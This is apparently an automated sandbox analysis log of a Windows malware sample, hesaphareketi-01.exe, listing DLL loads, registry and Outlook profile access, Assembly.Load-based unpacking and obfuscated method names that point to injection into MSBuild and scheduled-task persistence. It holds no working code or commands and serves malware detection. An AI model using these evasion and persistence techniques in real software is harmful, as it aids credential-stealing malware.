            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dll
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: hesaphareketi-01.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: hesaphareketi-01.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, HYtGDKqySeG7YTRyQj.cs.Net Code: TDdfTfLscr System.Reflection.Assembly.Load(byte[])
            Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, HYtGDKqySeG7YTRyQj.cs.Net Code: TDdfTfLscr System.Reflection.Assembly.Load(byte[])
            Source: 0.2.hesaphareketi-01.exe.5190000.5.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, HYtGDKqySeG7YTRyQj.cs.Net Code: TDdfTfLscr System.Reflection.Assembly.Load(byte[])
            Source: 0.2.hesaphareketi-01.exe.39c8e88.0.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 0_2_00F4EFB0 push eax; iretd 0_2_00F4EFB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_02B124B9 push 8BFFFFFFh; retf 9_2_02B124BF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06752F02 pushad ; iretd 9_2_06752F01
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06752EFA pushad ; iretd 9_2_06752F01
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06757497 push es; iretd 9_2_06757498
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06756A93 push es; iretd 9_2_06756A98
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_06752890 push eax; retf 9_2_06752891
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_067569CF push es; retf 9_2_067569D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0678EA67 push es; ret 9_2_0678EA68
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0678EAFF push es; ret 9_2_0678EB00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0678EB97 push es; ret 9_2_0678EB98
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0678EA0F push es; ret 9_2_0678EB88
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0678EA0F push es; retf 78E7h9_2_0678EDE4
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeCode function: 10_2_02BCEFB0 push eax; iretd 10_2_02BCEFB1
            Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exeCode function: 10_2_05386647 pushfd ; ret 10_2_0538664D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 16_2_0537287A push eax; retf 16_2_05372891
            Source: hesaphareketi-01.exeStatic PE information: section name: .text entropy: 7.469835605712907
            Source: WvaGpcFVX.exe.0.drStatic PE information: section name: .text entropy: 7.469835605712907
            Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, qoCKLV6IGSiEkOdL4Z.csHigh entropy of concatenated method names: 'Dispose', 'FATmZHsYdI', 'zjMaMVbVHx', 'O3a99xZXc5', 'CJymiiBYZv', 'mttmzU7CT7', 'ProcessDialogKey', 'vAZanWwS89', 'QIEamRPAme', 'L3gaaWg2JD'
            Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, Tnx7lX7pYZME0dkUiV.csHigh entropy of concatenated method names: 'eIUFNXew4r', 'AehFbEHwAW', 'FtIFlaWgKJ', 'n1lFMkQn6Q', 'XyVFs6ZuT4', 'aAwFRuhMoo', 'NFcFedLHqx', 'ljtF4RkaIv', 't91FqMRlJf', 'mvBFJ7ipMU'
            Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, jjb5i283Hv1KSrhtSt.csHigh entropy of concatenated method names: 'SD2LwG0XqO', 'AgULBtnNdJ', 'HMPLTmC78x', 'VXqLX4QidC', 'NtNLU0I5fW', 'fILL5qbjNe', 'GX6L3aDTcp', 'S6HLNG5kKw', 'aMXLbxQ0cQ', 'tmrLdmhEWw'
            Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, f7QpN0cQhZhrxgdGypl.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'f8J8GdPURZ', 'pGe8CMfR3H', 'yFp8ShLsLa', 'DnX8vsAWqI', 'WOC8Wx5vGO', 'gdE8QVjJWm', 'eRG8o1OxIO'
            Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, igPOmdm7iZ8TpUX9eT.csHigh entropy of concatenated method names: 'VX81XP35bl', 'nIf15MYy9s', 'fxX1NL8pqx', 'B0s1bfdlpc', 'DuM1h8NsfG', 'lYP1kGWi3m', 'Ek912BtAoR', 'rBW1Aklghf', 'oxe1Pxvw1x', 'Xl718sxydi'
            Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, vER2EhtOHL9TLC5ieA.csHigh entropy of concatenated method names: 'gyypGvHUOn', 'yInpChEGLd', 'YHRpSALSNo', 'GD8pvCiH9f', 'P0lpWUFv9S', 'jVOpQSl1LV', 'qvtpoixa58', 'nqtpgdsLUF', 'PuJpZjtZRb', 'OKppisuH7n'
            Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, HYtGDKqySeG7YTRyQj.csHigh entropy of concatenated method names: 'cSAE0ybjtU', 'fZBEOyNy7a', 'ChIEpBu556', 'EAvE1eUgOX', 'wVREHsxbaf', 'mA1EKLiNnc', 'qDRELKfDB0', 'GupEr7WZ2W', 'RoCEIO4Ypl', 'k2tEcxqAHO'
            Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, dRUD6tzwqSiuxr2ICW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zx7PFFtSdQ', 'SPhPh4XqGC', 'iJjPkNxBkx', 'JnuP2e3fjG', 'MtsPAL4aTM', 'kWOPPFLsqT', 'tPlP8WoRcb'
            Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, d1wm1cc5rZAYAaXFoBu.csHigh entropy of concatenated method names: 'I0ePwxLIVa', 'yWGPBsiwcF', 'psEPTvJ2N7', 'gv6PX7yK8X', 'lv6PUKvjrW', 'hUhP5CBDnU', 'tHoP3SYsoP', 'mBbPN49xSZ', 'L48PbdL6iu', 'NMiPdUSroM'
            Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, nxtOg2ySsFnBQpJMlv.csHigh entropy of concatenated method names: 'lKiLOHu6QN', 'iMGL12NDP6', 'Dj2LKTnvCK', 'liHKiUyDGh', 'm55KzBfogl', 'FrMLnPjatB', 'BTNLmeI2NN', 'fAVLa3erCE', 'wo9LEZiDbr', 'IZVLffI1fh'
            Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, Kyn3VQEXKatZt8C2gJ.csHigh entropy of concatenated method names: 'ToString', 'BgskJRZXfS', 'Qg1kMMob5C', 'sFSkulpG3L', 'ewYksJc7rC', 'tb0kRHstqX', 'cI5k684jax', 'Bm3keZfQdX', 'eQ0k4LEql6', 'KXKkVK30Q8'
            Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, HA5KGVnDr1g9DDY2U3.csHigh entropy of concatenated method names: 'dXATNOPNm', 'eZFXATkAR', 'LDi57cO12', 'Chy386fc1', 'i5kb8Vw95', 'j0IdFn4Ae', 'hhMR7jluUZlA0VBbQ3', 'p1QEwUK4GoxO7fQisL', 'RS1AYk33V', 'smT8ga3vI'
            Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, iEdKtAhoOZ61OEIwZf.csHigh entropy of concatenated method names: 'Pk8AliZojn', 'jbEAMxtRT5', 'F7FAuWbynl', 'u3MAsNyCnE', 'hXTAGaQsLQ', 'NBlARIOV7v', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, QqJtG6Fm8l5o2Jes3n.csHigh entropy of concatenated method names: 'RdA2cXxPBi', 'oNR274dYNl', 'ToString', 'Sa02O2DZis', 'tuP2poTc81', 'GuF21Ss8Ih', 'Ju92HwW4os', 'fcJ2Klkhhl', 'e272LoWvFF', 'gkw2rgKVWr'
            Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, Mj7IHJPEgFkKQb2HIB.csHigh entropy of concatenated method names: 'uOXAOfRwYO', 'uLDApfRpLd', 'iSOA1r3WbM', 'jWPAH8s5jm', 'zsUAKGOWTw', 'RXUAL4bruP', 'Yf1Arjnegj', 'zOiAIl83Ia', 'yBOAcbHYm3', 'viHA72gUYW'
            Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, dO4cCFGreIfcTfcEoq.csHigh entropy of concatenated method names: 'CT3K090LuZ', 'G9sKpJqPGd', 'vRkKH3HWmF', 'qHdKLRsXYR', 'yAtKreTfru', 'bsAHWhAW0V', 'qDgHQIPw5c', 'ztNHoMQmGH', 'kZGHgZqyVi', 'u3rHZLRqqm'
            Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, FqGxhrDon3ZgwcSj4E.csHigh entropy of concatenated method names: 'nKVPmqgSj3', 'bK2PEDRS5Y', 'yADPf6llpn', 'VUDPOb4Vqv', 'RCGPpjXFXp', 'kmNPHPW3sW', 'Dm4PKQlUaf', 'GZtAoXIIHV', 'sR4Ag0IUEJ', 'Tu9AZ25sG1'
            Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, WEcm2lgpsOIjQaW3Ww.csHigh entropy of concatenated method names: 'fXemLDXEIB', 'eDymru7CjA', 'JDbmcIxKsj', 'Xlim78tXvg', 'ra8mhSW4Gv', 'wcamkSKYes', 'IjC5hroY0wJLd4Dk0U', 'Jm6Ck8WaL4bhiFyDDw', 'qbYmmPHKji', 'l26mEXBaeo'
            Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, IXiuyndR63KB667cvG.csHigh entropy of concatenated method names: 'MbUHUTuvaq', 'RNnH3xLSBW', 'o8w1ugfSly', 'zSn1s3DCUm', 'dOY1RH4M11', 'wNt16rfnrY', 'MYi1eRThbc', 'hKi14564hY', 'noH1VEarSS', 'axs1qmGMvm'
            Source: 0.2.hesaphareketi-01.exe.4378898.3.raw.unpack, p7tuS7CtYtgO2dJ1Ly.csHigh entropy of concatenated method names: 'DFT2g7XXW1', 'cGu2iclsp3', 'XYsAngdTwq', 'FpCAmNF5km', 'gse2JxEg2N', 'gik2YLUjMY', 'qOs2jflFqv', 'tim2GWli8M', 'ecX2CBUKc5', 'NXp2S8X62m'
            Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, qoCKLV6IGSiEkOdL4Z.csHigh entropy of concatenated method names: 'Dispose', 'FATmZHsYdI', 'zjMaMVbVHx', 'O3a99xZXc5', 'CJymiiBYZv', 'mttmzU7CT7', 'ProcessDialogKey', 'vAZanWwS89', 'QIEamRPAme', 'L3gaaWg2JD'
            Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, Tnx7lX7pYZME0dkUiV.csHigh entropy of concatenated method names: 'eIUFNXew4r', 'AehFbEHwAW', 'FtIFlaWgKJ', 'n1lFMkQn6Q', 'XyVFs6ZuT4', 'aAwFRuhMoo', 'NFcFedLHqx', 'ljtF4RkaIv', 't91FqMRlJf', 'mvBFJ7ipMU'
            Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, jjb5i283Hv1KSrhtSt.csHigh entropy of concatenated method names: 'SD2LwG0XqO', 'AgULBtnNdJ', 'HMPLTmC78x', 'VXqLX4QidC', 'NtNLU0I5fW', 'fILL5qbjNe', 'GX6L3aDTcp', 'S6HLNG5kKw', 'aMXLbxQ0cQ', 'tmrLdmhEWw'
            Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, f7QpN0cQhZhrxgdGypl.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'f8J8GdPURZ', 'pGe8CMfR3H', 'yFp8ShLsLa', 'DnX8vsAWqI', 'WOC8Wx5vGO', 'gdE8QVjJWm', 'eRG8o1OxIO'
            Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, igPOmdm7iZ8TpUX9eT.csHigh entropy of concatenated method names: 'VX81XP35bl', 'nIf15MYy9s', 'fxX1NL8pqx', 'B0s1bfdlpc', 'DuM1h8NsfG', 'lYP1kGWi3m', 'Ek912BtAoR', 'rBW1Aklghf', 'oxe1Pxvw1x', 'Xl718sxydi'
            Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, vER2EhtOHL9TLC5ieA.csHigh entropy of concatenated method names: 'gyypGvHUOn', 'yInpChEGLd', 'YHRpSALSNo', 'GD8pvCiH9f', 'P0lpWUFv9S', 'jVOpQSl1LV', 'qvtpoixa58', 'nqtpgdsLUF', 'PuJpZjtZRb', 'OKppisuH7n'
            Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, HYtGDKqySeG7YTRyQj.csHigh entropy of concatenated method names: 'cSAE0ybjtU', 'fZBEOyNy7a', 'ChIEpBu556', 'EAvE1eUgOX', 'wVREHsxbaf', 'mA1EKLiNnc', 'qDRELKfDB0', 'GupEr7WZ2W', 'RoCEIO4Ypl', 'k2tEcxqAHO'
            Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, dRUD6tzwqSiuxr2ICW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zx7PFFtSdQ', 'SPhPh4XqGC', 'iJjPkNxBkx', 'JnuP2e3fjG', 'MtsPAL4aTM', 'kWOPPFLsqT', 'tPlP8WoRcb'
            Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, d1wm1cc5rZAYAaXFoBu.csHigh entropy of concatenated method names: 'I0ePwxLIVa', 'yWGPBsiwcF', 'psEPTvJ2N7', 'gv6PX7yK8X', 'lv6PUKvjrW', 'hUhP5CBDnU', 'tHoP3SYsoP', 'mBbPN49xSZ', 'L48PbdL6iu', 'NMiPdUSroM'
            Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, nxtOg2ySsFnBQpJMlv.csHigh entropy of concatenated method names: 'lKiLOHu6QN', 'iMGL12NDP6', 'Dj2LKTnvCK', 'liHKiUyDGh', 'm55KzBfogl', 'FrMLnPjatB', 'BTNLmeI2NN', 'fAVLa3erCE', 'wo9LEZiDbr', 'IZVLffI1fh'
            Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, Kyn3VQEXKatZt8C2gJ.csHigh entropy of concatenated method names: 'ToString', 'BgskJRZXfS', 'Qg1kMMob5C', 'sFSkulpG3L', 'ewYksJc7rC', 'tb0kRHstqX', 'cI5k684jax', 'Bm3keZfQdX', 'eQ0k4LEql6', 'KXKkVK30Q8'
            Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, HA5KGVnDr1g9DDY2U3.csHigh entropy of concatenated method names: 'dXATNOPNm', 'eZFXATkAR', 'LDi57cO12', 'Chy386fc1', 'i5kb8Vw95', 'j0IdFn4Ae', 'hhMR7jluUZlA0VBbQ3', 'p1QEwUK4GoxO7fQisL', 'RS1AYk33V', 'smT8ga3vI'
            Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, iEdKtAhoOZ61OEIwZf.csHigh entropy of concatenated method names: 'Pk8AliZojn', 'jbEAMxtRT5', 'F7FAuWbynl', 'u3MAsNyCnE', 'hXTAGaQsLQ', 'NBlARIOV7v', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, QqJtG6Fm8l5o2Jes3n.csHigh entropy of concatenated method names: 'RdA2cXxPBi', 'oNR274dYNl', 'ToString', 'Sa02O2DZis', 'tuP2poTc81', 'GuF21Ss8Ih', 'Ju92HwW4os', 'fcJ2Klkhhl', 'e272LoWvFF', 'gkw2rgKVWr'
            Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, Mj7IHJPEgFkKQb2HIB.csHigh entropy of concatenated method names: 'uOXAOfRwYO', 'uLDApfRpLd', 'iSOA1r3WbM', 'jWPAH8s5jm', 'zsUAKGOWTw', 'RXUAL4bruP', 'Yf1Arjnegj', 'zOiAIl83Ia', 'yBOAcbHYm3', 'viHA72gUYW'
            Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, dO4cCFGreIfcTfcEoq.csHigh entropy of concatenated method names: 'CT3K090LuZ', 'G9sKpJqPGd', 'vRkKH3HWmF', 'qHdKLRsXYR', 'yAtKreTfru', 'bsAHWhAW0V', 'qDgHQIPw5c', 'ztNHoMQmGH', 'kZGHgZqyVi', 'u3rHZLRqqm'
            Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, FqGxhrDon3ZgwcSj4E.csHigh entropy of concatenated method names: 'nKVPmqgSj3', 'bK2PEDRS5Y', 'yADPf6llpn', 'VUDPOb4Vqv', 'RCGPpjXFXp', 'kmNPHPW3sW', 'Dm4PKQlUaf', 'GZtAoXIIHV', 'sR4Ag0IUEJ', 'Tu9AZ25sG1'
            Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, WEcm2lgpsOIjQaW3Ww.csHigh entropy of concatenated method names: 'fXemLDXEIB', 'eDymru7CjA', 'JDbmcIxKsj', 'Xlim78tXvg', 'ra8mhSW4Gv', 'wcamkSKYes', 'IjC5hroY0wJLd4Dk0U', 'Jm6Ck8WaL4bhiFyDDw', 'qbYmmPHKji', 'l26mEXBaeo'
            Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, IXiuyndR63KB667cvG.csHigh entropy of concatenated method names: 'MbUHUTuvaq', 'RNnH3xLSBW', 'o8w1ugfSly', 'zSn1s3DCUm', 'dOY1RH4M11', 'wNt16rfnrY', 'MYi1eRThbc', 'hKi14564hY', 'noH1VEarSS', 'axs1qmGMvm'
            Source: 0.2.hesaphareketi-01.exe.6db0000.6.raw.unpack, p7tuS7CtYtgO2dJ1Ly.csHigh entropy of concatenated method names: 'DFT2g7XXW1', 'cGu2iclsp3', 'XYsAngdTwq', 'FpCAmNF5km', 'gse2JxEg2N', 'gik2YLUjMY', 'qOs2jflFqv', 'tim2GWli8M', 'ecX2CBUKc5', 'NXp2S8X62m'
            Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, qoCKLV6IGSiEkOdL4Z.csHigh entropy of concatenated method names: 'Dispose', 'FATmZHsYdI', 'zjMaMVbVHx', 'O3a99xZXc5', 'CJymiiBYZv', 'mttmzU7CT7', 'ProcessDialogKey', 'vAZanWwS89', 'QIEamRPAme', 'L3gaaWg2JD'
            Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, Tnx7lX7pYZME0dkUiV.csHigh entropy of concatenated method names: 'eIUFNXew4r', 'AehFbEHwAW', 'FtIFlaWgKJ', 'n1lFMkQn6Q', 'XyVFs6ZuT4', 'aAwFRuhMoo', 'NFcFedLHqx', 'ljtF4RkaIv', 't91FqMRlJf', 'mvBFJ7ipMU'
            Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, jjb5i283Hv1KSrhtSt.csHigh entropy of concatenated method names: 'SD2LwG0XqO', 'AgULBtnNdJ', 'HMPLTmC78x', 'VXqLX4QidC', 'NtNLU0I5fW', 'fILL5qbjNe', 'GX6L3aDTcp', 'S6HLNG5kKw', 'aMXLbxQ0cQ', 'tmrLdmhEWw'
            Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, f7QpN0cQhZhrxgdGypl.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'f8J8GdPURZ', 'pGe8CMfR3H', 'yFp8ShLsLa', 'DnX8vsAWqI', 'WOC8Wx5vGO', 'gdE8QVjJWm', 'eRG8o1OxIO'
            Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, igPOmdm7iZ8TpUX9eT.csHigh entropy of concatenated method names: 'VX81XP35bl', 'nIf15MYy9s', 'fxX1NL8pqx', 'B0s1bfdlpc', 'DuM1h8NsfG', 'lYP1kGWi3m', 'Ek912BtAoR', 'rBW1Aklghf', 'oxe1Pxvw1x', 'Xl718sxydi'
            Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, vER2EhtOHL9TLC5ieA.csHigh entropy of concatenated method names: 'gyypGvHUOn', 'yInpChEGLd', 'YHRpSALSNo', 'GD8pvCiH9f', 'P0lpWUFv9S', 'jVOpQSl1LV', 'qvtpoixa58', 'nqtpgdsLUF', 'PuJpZjtZRb', 'OKppisuH7n'
            Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, HYtGDKqySeG7YTRyQj.csHigh entropy of concatenated method names: 'cSAE0ybjtU', 'fZBEOyNy7a', 'ChIEpBu556', 'EAvE1eUgOX', 'wVREHsxbaf', 'mA1EKLiNnc', 'qDRELKfDB0', 'GupEr7WZ2W', 'RoCEIO4Ypl', 'k2tEcxqAHO'
            Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, dRUD6tzwqSiuxr2ICW.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zx7PFFtSdQ', 'SPhPh4XqGC', 'iJjPkNxBkx', 'JnuP2e3fjG', 'MtsPAL4aTM', 'kWOPPFLsqT', 'tPlP8WoRcb'
            Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, d1wm1cc5rZAYAaXFoBu.csHigh entropy of concatenated method names: 'I0ePwxLIVa', 'yWGPBsiwcF', 'psEPTvJ2N7', 'gv6PX7yK8X', 'lv6PUKvjrW', 'hUhP5CBDnU', 'tHoP3SYsoP', 'mBbPN49xSZ', 'L48PbdL6iu', 'NMiPdUSroM'
            Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, nxtOg2ySsFnBQpJMlv.csHigh entropy of concatenated method names: 'lKiLOHu6QN', 'iMGL12NDP6', 'Dj2LKTnvCK', 'liHKiUyDGh', 'm55KzBfogl', 'FrMLnPjatB', 'BTNLmeI2NN', 'fAVLa3erCE', 'wo9LEZiDbr', 'IZVLffI1fh'
            Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, Kyn3VQEXKatZt8C2gJ.csHigh entropy of concatenated method names: 'ToString', 'BgskJRZXfS', 'Qg1kMMob5C', 'sFSkulpG3L', 'ewYksJc7rC', 'tb0kRHstqX', 'cI5k684jax', 'Bm3keZfQdX', 'eQ0k4LEql6', 'KXKkVK30Q8'
            Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, HA5KGVnDr1g9DDY2U3.csHigh entropy of concatenated method names: 'dXATNOPNm', 'eZFXATkAR', 'LDi57cO12', 'Chy386fc1', 'i5kb8Vw95', 'j0IdFn4Ae', 'hhMR7jluUZlA0VBbQ3', 'p1QEwUK4GoxO7fQisL', 'RS1AYk33V', 'smT8ga3vI'
            Source: 0.2.hesaphareketi-01.exe.43daab8.1.raw.unpack, iEdKtAhoOZ61OEIwZf.csHigh entropy of concatenated method names: 'Pk8AliZojn', 'jbEAMxtRT5', 'F7FAuWbynl', 'u3MAsNyCnE', 'hXTAGaQsLQ', 'NBlARIOV7v', 'Next', 'Next', 'Next', 'NextBytes'
